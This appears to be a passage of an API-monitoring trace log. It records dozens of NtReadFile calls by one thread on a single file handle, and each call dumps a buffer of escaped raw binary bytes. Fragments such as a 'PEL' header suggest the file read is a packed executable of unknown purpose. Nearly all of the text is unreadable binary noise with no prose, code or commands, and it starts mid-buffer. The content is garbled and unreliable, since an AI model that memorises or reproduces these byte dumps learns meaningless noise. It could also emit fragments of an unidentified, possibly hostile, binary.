\x8b=_\x0b\x02>\xceO\xf7.3u\x0448X.\xe3N\xda\x8b\x99kP\x8cs6+\xb0\xf7f'\xbdI?G\xc1\xa9\x02\x94\xbaa\xcd\xff r\xb4V\x18 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,738 | 364 | NtReadFile |
Buffer => [F\x0eanvP\x06H\x0fj\x01\xb4\xd9\xdc\xd6\x8e}Xw\x05T-\xb70\xd6v\x1d\x02\xf7\xec^@\xcc\xc1,\x17\xcam\xc1J\xc2W0\xd4\xfd\xc6h\x04\xb9]6t\xcbP\xc8\xf4j\xf5a\x07\xf6v\x97\xcd\xc2f\xf7\xf8.\x8c\xf9\xfax\xfbe\xdfo\x1a
J\x07\x88\x8bE\x08\x8b=\x84\xd8\x8d~v\xe1\x7f@\x83\xc0\x04QP\x89\xb9\xff\xd7\xee\x89]\x089\x85\xf3\xe5\xd6\x02\\xd8\xfeu\x0eh\x18@\xdf\xa6{\x9f\x80\x0cP\x0e\x98|8\x9d!\x0f/\xd6\xcd\xdc\x84\xa9\x9f-&xV\x0cv\xd2\xf0\xfeI\x80<\x08\t\x0e\x19<\x90\x8d\xa3\xa6{v\xd8P+\xd6\x08j 6t(\xd8w\x0b\xdf\x80Ij\x02Sj\x034\x02\x7f\xd39\xd3\x1cp;\xc3t2\x83\xf8\xff|\x92\x1dv\xbaclph\x0cG:&4\x14\x10\x11d\xeb\x10\xdf\xee\xccd%`>u\x0f\xff\xfb\x83}\x08\x02\xb8\xc3\x9a\xe1\x0f\x8c\x19k\xcf u\xfd>\x9a\x91b, FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,738 | 364 | NtReadFile |
Buffer => \x81\x03FW\x89\xa8\x05YC\xdaR\xfb\xfdBY]\xfc;\xc1u
3u\xd8c\x92l\xdf\xe9-\x06@\xeb\xf6+\x14\x04x]\x83\xe6n\xb0M\x00U\x0cC\x93\xb7\xb6}{c\x84\xc9\x08:\x02\x18AB\xeb\xedP\x01\x02/\xff\xe2\xf1
+\xc17'VW\x8b}\xf6\x89u/\xd0q\xe1\xf8\x80?I\x84H+S\xd6>&\x0f\xcc\xd2\xdd\xdc\x851
\x16\xfcF
##\xeey\xe2\x97\xf3F\x0f\xbe\x04>\xca\x11Y\\xdf\xda\xffo\x0e\x88D\x1d\xdcCF\x83\xfb\x0fr\xe2\x80d
%\xc98M\xdc\xf87\x13\xb7\x89\x7ft\x16\xc6/\x10@\x8d\x0c\x89\x808\xbcs\x05\xde\x1fLJ\xd0\x83\x17O;u\x01F\x19'~7\xde\x8e\xce\x00Tj\x14\xef\x99\xb7\x13M\xb8\xf8\xa2=\xba\x96 ]\x8e\x16\x8b\xdb\xdd\x88\x19\xeb\x16\x10%pD\xb9\xb5\xa5\x08\x90P
\x7f\xb8\x10\xee\x16\\xb7\xff\xdc\xb0\x8bB0\xfc +\xf3Pa\x07\xcf\xda\xae\xf4\xc4;\xf0\xedtQ FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,738 | 364 | NtReadFile |
Buffer => \x00`\xf4;\xb6\xd4\xd0\xbeH}k\x81\xfe\xb9\xe1_\xc5\x03U\xf6v+\xfc\x11\x85\xd2tJ\xc8O\x17@ ~\x0b\x8a\x136\xf8\xd2\xff\x88\x0c>F@Ju\xf5\xc6\xc3.F\xeb'\x94\xfc\x8e\xcd\xb1`\xc6\x02\xa5f\x01\xd7\xaf\xfd\x9d\\x85g\xa5%\xff?\x0bT\xf6\x8d\xc6\xbb\x12\x04|\xa6\xeb\x0biv|7\xff.\xa8\x99\xfeJ\xffN\x85\xf6\x7f\xf4\x80$\xf7@^t\x03\xf7\xfa\xc4\xad\xa9\x92\xa7\x1a\xe70P[\xcc\x10\xcex{F\xae\xc8\xf6\xb1u\xe8^\x1b(\x05Z\xe9\xaf\xa0j\x0cX
\xcb#p\xdbxk<\x02\xf4}\x079\xe9\x16+u\xbf\xd8\x85\xa1ESr\x8b\xdeP)&\x85\xc1n\xf0\x8b\xd8Y;\x17Y|\x1fs\x00\xd4m[\xdbF
\x03N\xd6\xc15\xf8\x08\x06n\xb3\x80\xeb(\xf4T\xe0\xeb\x03:\x8b\x0eXp/\xb5\xd2\xc9\x14\x01\xddx\x01\x19\xd8\\x10\xbd\xdc\xee\xa2|\xcd\x12a`\x7f \x8dC
\x1a\x14L\xd7\xde5\x9c\x02I\xde FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,738 | 364 | NtReadFile |
Buffer => w\x04\xd1Xj5\xeb\xa4BW:\xe4\xc2\x92V\x8ew\xb6\x9d\xae\xe6\x80\x11
\xe8\x93\x15\xa3\xdc\xd6xdL\x11(\x8b@}I\x00\x1b\xd6\xd0\x05\x07\xa3q\x15\xb5\x8dB\x03\x18\xf8\x81\x19-\xfbY\xfd\xd3\x04k\xc0X\x06\xf5\x9b\xfb\x95\xe5d\xe1:\xf9\x83z\xfftb\xd1\xfdv1.1-\x05\xe9 \xef\x8e\x0c\x0b\xa1\x04\xf9\xc3\x8b\xab\xa9mF\x17\xb6\xf8WH\x80\x03\x80\xea\xd0\xae\x85.@2<\xae\xba3Hm\x87tSg\x10^$\x01w\x90\xc1\x0f\x0c3\x8a\x0e\xd6\xf4m\x1c`\x15\xe2\x9dY\x13\x1fl[\xa3c{u\xc5\xbb,\xc0\x1c\x0c\xdb\xe2\x99\xcd0\x08\x1d\x17F27\\xe2\x96\x05u\xe3\xd9\x89\\xd9<<@\xb1\x92\xcb\xdet?(T\x14\xde\x7f\x15\xacwx\x97\x88\x04+CY<\x19\x16\xba\xc1J\xbdo@\x987\x8cTk\x89\xedzO\xf9\x04+\x017 \xdd\x83\x1f\xd8\xebP\xc4+@\x0f\xc2\xce\x16\xb2\x98\x15*\x85\x0b\xdd\x8e\xe4+\x06 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,738 | 364 | NtReadFile |
Buffer => \x1fw\x016\xd1='\x7f\x12
\x8d\x8d\xb5\xa5`\xe0\xbe2\xcb\xd5(\xe2\xc1\xa2nG\xec\x8c\xb3\x82\x18b\xf0\x93\x86V
\x1e\xdc-\x8bv\x06\x0b\x87Phn\x1c6\xd7\x86\x83Z\xc8\xe2\xc4\xc7\x0f\xa7\x0ej\xc3\xe2-\xd8\xd9D=\xeb?W\x16\xddb\x18\xf0\x80f\x05\x00\x95\x1c\x01\x8a\xaf\x99\xb0K\xcf\x88\x06d\x84\xa1|\xb9\x88\xb5h\x1d$\x85\xd1e\xe8P\x93\xc8\x04yP\xa1\xb3$
x\xfe
P\x1f5\x0b\xb5<g,\x14c\xfe;7{\x13\xf2)\xfc\xfcl0\x12\xfef\xcf\xd9<-\xfc
\x1e\x17=\xfcY'\xdb\x16\x86I4\xff\xd7\xe4\xe0\xfe\xbaX8\xf2\x08\x16\x17\xce7\x04YH\x06\x8d\x8c<Zb\xd6\xb6\xad\xeb\x88\xb0\x84\xa9\xcdn\xf1\xeaey\x98\xf9!\x06F>\xcc\xa6\x1a\xaa\xf8,\x84\x8c2\xcc\x06\xc4.\x95\x1c\x14\xf7\xf6*>\xf5\xee\xbb\x8fbt'A;\xca|\xf4\x0bh\x83\xc0
`\xa4\xf8h-\x0c\x0c\xe7\xf4&d\xa8\x7f5R@ FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,738 | 364 | NtReadFile |
Buffer => \xca \x8a\x19\x88\x18@A{\xf7G2]`k+[\x01\xf2\x8b_\x04\x97\xa2\xd19Otu\xaf\x99\x0f\x8eT\xfav\x88tv|M\x0cP\x80~,\xd4hc\xe4\xb4H\xec\xfaL3\x18l_a^\xfd[\xcc\x08p\x9b\xd9\x88\xd3}8\xd6\xc4]j\xfb\x0b\x8d\x8d_\x01O\xf8\x8d\x1e\xff-\xbcu]5\xb3\x15\x85P\xcf~\x13\x04D\x96\x1c\x17*\xaf\x94\x10\x17\xd9\xccI]\xa8\x117\x9f\x7f\xed\xb9\x12}#\xbe\x11\xcf\xbe\x19\x140\x80\xba\x18\x16@Y|\xed\xeb\x0e\xb7\x1a5\xe9\x141b\xb7\xc8|r+\xfc\xff\xee\x8dQ\x03;\xd0}e;\xcf}a;\xc1WO\\x06\xbf\xb56\xd8\xbb!H\x12O\xd8\xf8;\xc2~C\xb5\xe2M\xfc;\xc7~?+\xc1\x0c\xff\x07|6Km\xb1\xd1/\x16\x03\xce;\xd7}\xac\x01\x8f\x15\xd1\x10|S\x11BA\x81\xfa\xfeR\xe9\x1eH\xf5Z\xf7\x1076;[\xe6\xc2\x97\xcb\x8b\xfb;}\x0c\x8c1\x89\x8b6u\x12m FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,738 | 364 | NtReadFile |
Buffer => \xbc\x0e\x02u \x8f_\xa0\x12cp\xea\\x9eeWN\xd8\\xb0\x8b\xef;\xfe\xa9>\x12s\xc0\x0c\xe5\xdcNY95\xe5)\xb8\x83\x96\x8b\x1d\x84\x86\xe4\xa3\xdf\xb3\x85Wp\xd3 \x8d\xbd\x05PO\xd5\x05\xb3\x16?\x80<8\\xf9\x19<;\x10g\x0e\x15]\x11x\x18\xc9r\x8c\x93h@k\xa4\xfdV}\xb6\x95*\xfb\x92\xfc\x15Pu#\x00\x91\xa7\xe05\xd90\xe0X1\xbbzu\x03#O\xeb\x11\x1f\xce\x8a\x8f\x98$k\xac\xd7\xbd\xd0\xe7f\xdbp<;\x1b\x08\xd1\x00t\xae\xcc0\xb2|\x11 \xd2\x9c\x0fZ\xbeQ6\xd9\xc5P\xbeTP\xb7\x88}\xc9+\x13\xf6\xa5\xcc j
\xbb\xc0\x84K(\x89\x0cH"A\xd8QvVB\xa9JCH'X\xe1\x17\xb1\xb5\xd4P-Yy\x19\xf8\xf8\xa0\xb1\xbc\x1cN[u\xca\x03N\x19F\x9b\xb4\x18\xaf
\xa6i\x9a^g\xe5Loc\x82\xa6i\x9aal Se\x96eY\x96\xf0tting,[AYs FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,738 | 364 | NtReadFile |
Buffer => \x07\xde+X]N\xb6\xe7\xb3\xe0\x01\xe2\x01\xeck\xe4\xd8\x88\xd1\x9b\x15\x92\xa8\x04!\x88<gt?*\xc6^\xa7,8\xc5:3M\x01@\xaf\x9ae\x88P\xbcGE\x89K\xc5\x12c\xd8\xf1\xbb\x08\x9dl\x05]\x80\xc7;\xdd\xc5\xff\x93\xc9\xa2\x1f\x08\x07w?\xff$\x95\xd9[\xe7\xef\x86M\xfa\xe8&D6h\xd8\x06/h\xc8\xe7\xe7\xe7\xe7(h\xb8!h\xa4\x1ah\x94\x13hp\x15\xb3\xe6\xe7\x0chX\x05hHWy\x97E\xbcc\x10hD\x11\x90\x03v\xa9K<\xea.\x11J6h<=\x8c}vr, +hh\x18\x07\x8dV\xf1\xac\x10\x90\x06\x81\xc3\xa6;\x98t/YS\x1c\xdbK\xd0(\x99\xe2\x05\x01a\x8e\x14o\x15\xa4]\x18\x01~$\xdd\xb7\x82\x91Z\xde;\xcat\x08$A\xa2M\xd65\xf4\x03Y\x94\x05@7\xd9\x7f\x84'\x03\x85\xd2\x89U\xfc~\x1a\x19\x1a\x17\x0f\x7f\x03\xfe\x80\xc2a\x88\x147\xad\xfc|\xe6\xc6\x84\x1eG@\xb3I\x14\xdc\xbe FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,738 | 364 | NtReadFile |
Buffer => \xfb\x19\xac\x15(
h$\x0e 8!\xd8\xc0\x94\x08\xfcP\x07;\xd0K\x84G\xe2\x82\x10\x0f\x85\xc2\x84\x19\x8f \xd7\x84/C8\xacWb2T\xa6\x0cG`\x98Q\xfe\\x91\xde\x11l\xca\x02 sPH~$\xe3A\x182\xf0\xfd\xc6f\x07^^\x13\x96&S\xa0\xc9h\xcb\x97\xf3<h\x90X\xd2\x9d\xccPh\x11GA\x1ac\xfe\xafW\xea\xd7
4F3O\xdaS\xba\xa2\x018+\xaa\xc7\x048\x88\xbe;\xba\xa63\x94\x9e\xb0\x06\xea }\xe8I\xc7'\x89\x03\xec\x81;\xaf}\x0ejC\x85\xb3\xdf\xaav\x1e\xeb\x0eP\xb0\xc3\x16\x8c\x13\x11\x07\x82\xd6\x00n\xe2%l\x80&\x00\x1eT\xb7\xff\x02\xf0f\x7f`\xde\xe8Dt9HHt-\x08\x0et\x81\xb0@\xb4\x1c\x04\xd0\xb4\x1f\xea\x02\x9f\xc1
\xcf0\xeb%'\x04Q!\xf4\xe9\x93/\xc3\x81\xc1\xa0\xeb\xef0\xad\xf9\xfdm&1\x88\x16\x80f\x01\x1f\x08\x02\xcfd\x9d\xeb\xe5\xedit\x1d\x04tt\x10wu FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,738 | 364 | NtReadFile |
Buffer => \xb6-\xacD\x103O_'\x1b\xf7\x80\x8e"\x9aYO\xed\xfcm\xba(\xe5x\x8b\xb8\xdbh\xf0)5U\xb3\x03\x92\xb1Y\xd3\xa2\xb7\xbd\xcd$W\x05\xf2\xb8\x98\x1dA\xb3\xef\xbdj\x1aTW
\xc9F\xaf\xfbAU\x14\x80\x8c"R\_pAL\xb9R\xdc_|\x05\xb9Qc\xd1\xb9\x84#V\x054Q\xe6&\xebvFh\xf8\xabWV\x18P
\x05\x1c\xe0a\xb4i3 H\xc8\xf7R\x15+\xe4\xf3\x0et\x83\x11\xf8\xc0\xc3SHE\xb9\xe1\xa2}\x9f\x1a\x01\xaf\x01~\x08E\x07\x0f\x8c
\xc2h$w\xc0\x8a\x1b\xd3@\xf8\x8f\x89\x9d\x0f\xff\xf1\xd4\xb2\xb1\xcaF\x9aF}\x06\x89\xb5Z 9x\x1b\xde \xfbs\xa1
n\xf8}D\xf8\x89\xbdD\xfaB\xec;s\xc0\x1f^Y\x0cA\x0b\x83|\x92\xdd
K\xf5M\xc3\x8d\xb5O\xf4\xa8\xc4\xb7\xab\xdd^us\x8b\xb1\xbf\x01?E\xb8\xf7\xe0\x02-m\x05\x9f#a#h\xad\x07\x0c\x13\x0c@w\xbb\xc1I\xf5\x15P FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,738 | 364 | NtReadFile |
Buffer => y\xb6\x91<lZ<+\xc1E\x93\xf0\x8f1>\xbb\xd5\x1a`\xcd\xb7\x81\x0ed6TS4n\xadNs\x07\xbf\x8d6\xfa\x00\x92\xe7;D11L<\xb2\xcf\x9c=\xd5\x00,\xcd%4 \xb1\x91\xeeY\xe1\xb5\x00\x86\x8f\xaa"\x0b\x06\x1e[^=4\x8cj\x8b\xaae\xe3\xe3\xd0\xeb
\xd6\x1b\x9a
B\xc9ho\x99\xfb\xe7\xf8u\xec\x08\xecGQ\xe8\xdd\x06B\x11\xeb\xee;\xc2\x01\x00\x83\x07,D\x11\x0f\x01\x8f\xd3\x9b\xa1r\x90\xcf\x05\x13+\x06~\xd1\x89\xc8\x10g~F\x02I\xdeuE\xde\xa0*\x05h,*\xdf\x11\x0e\xd8\xfcj\x99|\x1fw}\x18\xda$`k\xd6>\x88\x13\x0e\x1e\xf7Y\xe0\x8c\xe8\x84\xaf\xfc\xaa\xc6\x948\x87QB\x91$\xfe\xd3\x85\x87O\xe9\xb8\xe4vP\x83\xd8*#\xdfgC\xc0\xdc\xae\xb0*h\xa8R\xa0-L\x9ac\x17\\xff\x985$\x17\xd0\x82\x06\xe9\x9f\xd6\x01\xb1\x80\xb33W\xd9\x1e\x07cH\xc9Ja\xf0\xf7A\x8c\xd8\x87\x07\x10 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,738 | 364 | NtReadFile |
Buffer => \xa2\xbf\x00\xb0\xd2_\x8b\xcf\xf7\xf1\xb8s\x11=
\x0fK\x00,\xb8\xe0Z\x84z\xda\xfc\xb7\x9c#<Y!\x05s\x07h\x80\xeb\xdc]\x13\xde\xac\8\xaePs\x0bX\x84\xbb\x0b9ht,% \x1agW\xf2y<s&$'25p\x89\x91\xfc&%\xdc%ip\xdc\x007\x1bTs\x06`5{\xf6\xd8u\x04g\xdehh;, \xd0\x19\x9b\xcc\x91\x1e.\xd76|P\x81\xfa\xc2
\x7fR&'\xe3\x9c\xf0\x84})\x0c\x83Ar*\x0b2>\xc9\xd9\x93\x1er\x17\x12\x14
\x0f\x83\xa8\x1a\xbaf(?\xc6G\xe9C\x1c\x1eB\xde\xdcY\x8a\x028h\xd8+<r\x13\xb7\xddvJseB\xd00\xebA?\x07\x03{x%7Hh\x98\xf7\xf76\x048c;\xbbl\xebAY?%\x94X\xf2R\x9c\xc0l\x903\x18\x034\x04\x02v\xa9\xdchHGWKP\x03%"\x0c;\x03\x18\x95\xbbE\xc0\xbe$%X\x110\xa4j\x19\xd5\x05\x03\xf9\xfd0+ FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,738 | 364 | NtReadFile |
Buffer => \x94\xb5\xacU\xb7\xbe\x1b\x04D\xa8\xa2\xe8\xb9\xe2\xae\xbd\x98C\xc6\xcb
k\xcc\x03\xff\xff\xc3\xffx\xbb\xbe\xc0\xb70\xc6c \xdcN,My\xa4\xbc\x05\xab\xff\xe5\xe8\x8e\x9f
!
\xff\x9f\xff\xff\xfa\xb71\xfd\xfe\xff\x87?\xdai\xbbf\xe0\xab\xc4q\xae\x95D\\xc9Ex\x91\x95\x98\xa4\x8f\xfc\xff\xff\xd8\x9a\xa7\xb9=\xe3^$\x17\xed\x85\x05ch\xb5\xd6\xbek\x02\xe6b\xd5x\xe1\xd2\xf3\xff\xff\xff\xbd\x82\x18\x1a$\xd3\x8dM\xce<\xb5\xae\xbe\x90\x1c\xc5\xc4\x0e?\xe9.\xa1\xa7m\xbfU\x02@\xff\xff\xff\xff\xe2\xe0PI\x0f\xc3?\x12\xb6t\xb3{\xfc\xfa\x93\x96k\xd0\x92\xc7\xaaFMPWDHOUEJ\xff\xff\xff\xffQ\x8fu\x9c\xbeVGKNTA@CBBEC@DP/\xc4\x9aDDGF6n@$5\xff\xff\xff\xff\x1f\x9a\xb7\xb7\xa0\x08/5,5\x06C\x02./I"O%\xbe\xac\xfe\xa0\x125 \x0c\x14\xcc-e\xcd\xff\xbf\xfd FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,738 | 364 | NtReadFile |
Buffer => IMNG\x12\x97\xff\xf8\x17\xf1+\x18CzF=\xd8G\x7f\xb9.\xf5\xb6\xfd\xff\xff\xff\x81=W,&\x8e\xb9\xc8E\xd8\x02\xc2\xbaQ,\xe5\x1c\x1a\xf4*\xad\xd1\xb5A\x93\xa8~\x99\x8e<\xff\xbf\xfd/3\x10\xc2\xc1BN\xcc\xc2O\xe9f\x00\xf6\x9c,\xba<*\xca\x06{\x0c\x0f}\xdfX\xf8\xff\x89+z9\xe9\x11rrn\xd6\xd0\x81\x0c\x18\x01\xccB\xb6\x8aU\xff\xff\xff\xff7x\x16\xd5_Mxq?QQ.\xac.\x9a\xc1vM\xa8\xb6pz\x97<FW\xcf}\xd9\x02\xf2\xf4\xff\xff\xbf\xf0\xb3>\xed<\x86\x9f=\xcf\xbeG\xdb2\xf6\x96<Ew2r\xb7\x18*\x14i[+\xff\xdf\xfe\xffI\xffTW]w\xb7\x95\xb2\x02\xb5\xccUq-!V\<N\xcaP\xc2\x80E\xc8\x15\xc4\xff\xad\xff\xff\x99|\xac\xabs4~-@\x95ZRL\x18H+'oY\xa8\xdfI\xc9v\x02]\xe8\xff\xff\xff\xc2\x87Fz\xb2=g\xe0l\xf9\xf51\x9a\xb9` FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,738 | 364 | NtReadFile |
Buffer => ?/\xff\x1b\xfc\xff\xb1\x92%^?v\xfa?d\x18K\xd2]T\xeaV\xae\xbb>
<@\x07\x04\xbf\xd1\xff\xffz\xaf=\x9a\x02\xedF)\x85Hl\x1c\x9f\x9d\x1e_\xc3|\xb70P\x81\x95@\xff\x85\xff\xffM|~
\x86\xce>Q)\xd1\x1e@\xa2}/\xbd)\xda\xc4\x9c!\xabn\xaf\xc2x\xff\xd6\xff\xffm5K\xdb\xcd]\x93\xeeG+\xaf\x18I\x8dEM\x89I@tE\xbd&\xd1\xa7\xd6\xfa\xff\xff[\xb7?`\xbaT\x10s>\xdbQ\xbd\xc1\xe5D\xbc/\x07_\xdbl\x04\x01y\xed\xdf\xf8\xb7\xae\x97\x96p\xd1\x80L)n\xc9\x93\xc2/7W"\xce\xff\xff/\xf4\xce)S]7I\xf4Iqc\xba\xd8\xc5\xecq\xf7iTQ\xc0\x83\xb1cS\xff\xff\xff\xff\,\xf7\x13\x17\x04\xde\x95\x17s\x84\xa9\xd9(\xc2\x90\x01@\x18\xaff|\xfb\x1c\x81\xbf\x15\x9e\x12\x87\x04\x85\xff\xff\xff\xffB\x1co\xd6\x8a\x84.\x87'\x865\x896\x88 \x8a\xa43\xf8V\x8b3 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,738 | 364 | NtReadFile |
Buffer => *\xf4\xff\xab\x0f1\x84\xf7\xbc\\xd1\x06z\xb8$g\xff\x17\xfa[\xf8\x1f\x8eIB\x07\x82\xec\xd1\x15`7:1\xc8\xe24D\xff\xff\xff\xff\x95y\x07Ib\x8b\xd4\x9b\xa9j\x89
\x82\xeek\xee\xf6S\x06\xf3\xc8\x1f\xf4\x0e\xaax\xfe\xe6\x06\x87N\xb7\xff\xff\xff\xffz\x8e?G
\x9e\x80\xa2B\x12\x9a\x91\xd9*\xbe\x03\x8e\xc8\x17E5\xf3\xca\x8a\x01t\x012\xa0\x81\xf4\x18\xdf\xda\xea\xff\x83&\xe4\x89*\x95\x84,Pa?<\xca\x0c\xc0Z\xfb\x15\xff\xff\xff\xffzJ\x015z\x83=\x08\xd9\x11\xd19\x89\xbe\x1f\xe8\xf9S\x9c6\xda\x11U\x18\x84z\xca\x86\xb6\x91\x87r\xff\xff7\xf8\xe6\xff\xec\xb5x\xc7<gSvQf=\xca^,y\xe2pG(}\x80&\xfc[|\xab*\x0cO\x17\x8bG\xefR\x18F\xf2\xd8\x17\x14\xff\xff\xff/\x94\x06\xb6z\x16\xe7sF \x16\x08z\x805Pr\xe2\xf4,JJ\x8b\x02\x836x-\xbc\x89\xff\xbf\xf1\x17\x1f+\x83\x1fE FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,738 | 364 | NtReadFile |
Buffer => DYl\x83Y\xa7\xa9\xdb1\xb0%'\xcd&\x85\xd1\x16\xe17(\xf0\xbf\xbf\xed\xd1\xbc\xfcQ\xcd\x17\xe9\x83\xc6\xad\xcb@\xbf\xf0\xff\xff\xc5\x9d\x9f\x11\x8b\x00\xa9\x84\xc9@3\xabD2Zy)\x86/KFZj\x8b\xc9\x14\xff\xb7\xff\xff\xe2\x14KY\x0e\xcc\x8f"\xafq\x87\x13\x81X\xd0e\x1f\xbc\x04\xcd1M\xe6\x0b'-\xae\x88_\xe0\xff\xff\x9fWR\x0e4\x8bOB\xa9$\xdd;\x07\xf0\x18)\x94\xcc\x11\x14cJ\xf1\xf4\xfe/\xf4\xffA\x13\xec\xf4cM\xf9\x848\xf2\xabv\xdbr\x81yB5`\x01\xc1}B\xbf\xfd\xff\xb7C\xb8WB\x82\xcb \xbe1\xe8\xde;\xedM\xf7F\x87\x8a!@\xa3\xe8W_\xe0\xdb\xff\x1cM\xa9\xd0\x0b\x12\x13"\xf7\x14\x8eD\xe2\xbda8\xac\x80\xbd\xae\xdf\xe8/\xf4\x80U?\x0bY\xb9
\xf4\xbeS\xc3{D\xa9}\xaf/\xf5\xff[\xffs=K\xbe\x9c\xfez\xa3\x80q\xaa[\xcb_[R\xc1\xff\xbf\xd4\xff\xa0\xe9\x1e\xb7\x98\xd8 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,748 | 364 | NtReadFile |
Buffer => JK\x18\x19\xeb\x1d\xb3\x9e\xed[\x11 \xf6\x1d\x9e{\xdf\xe2\x17\xf8D#\x19\xaaN
_\x10\xbeyf\xe9\x91\xb6\x99Z7\xfa[\xff\x81B\x1f\x18\xf9 \xeeJO\xb5|\xc7\xd1+}\x9b\xc6.\xfa\xff\xff\xff\x92\x96\xcc@\QP\x11nE\x11u\xb6\xcf\xaf,Y\x92\x1fEN\xc4\xe3\xeajq\x1a\xba\x0f\xff\x17\xfe79z`S\xce\xac\xc6<Q\xdf\xa4W\x11mW48\xcaQ\x16\xc1\xf4\xb7\xf8\xed\xd6\x1ck\xc3t\x11\x04N\xd1X\x9e!$'\xdf\xa7\xff_\xe2o,'a\xa7K6\x19\x19\x1b\xc0[\xe2\xed\x11Z@Y\xfd\x87\xed[\xfc\xff\xffP\x89\x14Le\x9f8\xf1\T7r\x16\xf9+i\xcb<(\x1a\xbf\x1b\x83_\xf8\x05\x16\xfa\x8dy\x89[zcC+\xa9\x1b\x80\x06\xa7\xff\xff\xff\x97Uah_\x90)\x8c\xe5P\xb4\x19{\x90\x83\x0e\xff#\xd4Qb\x1f\xab\x1b\xc4I2\x90\xfd_\xfa\xff\x96@\x90\xab\x8d,2\xf5\x11`\xab\x04\xbdv\xba\xae FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,748 | 364 | NtReadFile |
Buffer => \xf5\xd288.
@C"O\xb3\xe5\x18eCQ\xff/\xfd\x06\xc7A'\x80\x8f\x8f\xcdZErF\x19v\x1a\xb7\x11M{\xa5\xfe\xff\xffiQF\x11\xcfdZGB-n\x18Va\xedWA%\xfd_\xf1NJ\x1d\xbcp\xab\xff\xc59\x04'c\xd1\xbf7 \xaaEbz!o%\xfd\xff/-\x03 \xf6\xa5*M
\x01W\x81A\xc1 \xbaE\xcdqB\x8f\xcc\x89\x03yF\x14a\xbe!\xa8c\xff\xb7m\x11m\xcc\x05\x81\xbe\xbe\x16\xc2\x8c\xbe\xaaQ\xd1\x00\xcb{\xe3\xff\x8dG2F\x06@\x9a4F\xca_\xc2\xaf\xbdO3\xac\xf9A+\xdd\x0e\xd8\x11P\x81\x0c2\xae*\x0e\xa5.\xc1\x072\xa5p\x88s3L\xe1\x1d\xd8\xb7\xbaI=\xc2\x8e55\xc8\x84/\x88\xc2B\xf6\x84\x0c4a\x00\x1cL\x0b\xfc\xb7\x7f\xc2\x80C\xc0\xbcA\xb2\x95\xc2\x90@\xccUn\xc2\xbc\xf9NJ\xf1F\xee\xcbC\x03\x94\xa4\xb6\xa8"\x8b\xfe\xd2\xff
\xf4C\xc2\x83E\xc8F\xc2 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,748 | 364 | NtReadFile |
Buffer => \x0e\x80V[\xbd\x00\x1avue\x0f\x8b\xcc\xdc\xa5\x84\x11)um0\x0cO\xb3\xcd&\xb7?d\xc2\xf8m\xa0\xa2an\x87se0\x8a7\x17k\x8cr\x10\xf6\x07isd\xbd\xf6\ z\x19\xf2\xce\x10\x14\xa2x\xae[P\x08"97\xa1+3*a*!\x02J\x0ff\xb3T\xcd \x01\xa1U\\x0f\x16\xb0\xdfNBuffA\x0f\x0bLow\xf6\x19\xb6#wvIr\x94#w
\x85\x9bqZ\xf4\xcc\x0cM\x82\xc2\x00\xa8mY\xb6M\xd7\xb7\xd8b@\xff\x04\x02\x13\x0beY\x96e4\x17\x12\x10\x03\xabeY\x96\x0f \x14s9\xbf\xff\x84\xbc<PEL\x01\x03\xe0\x00\x0f\x01\x0b\x01\x07\xae{\xd2l\x13r*\x802\x04\x10\x03\x82lg\xb1\x905\x0b\x023\x04\x99[\xd2\xcd\x07\x0c\xd0\x1e4{\xd9\x1b\xd8\x10\x07\x06\x00\xc0y\x08@\x80[dx\x02\x18\x05F\xb8\xc2v+dx\x01\x1e./\xd8\x93\xa0\x98\xa4p\x90\xeb6\x7f\xbb\xb0\x04# \x0b` FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,748 | 364 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x00\x00 \x00\x00\x80\x0e\x00\x00\x00\x90\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00@\x00\x00\x80\x02\x00\x00\x00h\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00X\x00\x00\x00\xd8\xf0\x00\x00\xe8\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00\x80\x00\x00\x00\xc4\xf3\x00\x00(\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xd0\x00\x00\x80\xa8\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00\xc0\x00\x00\x00\xf0\xf4\x00\x00"\x00\x00\x00\x00 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,748 | 364 | NtReadFile |
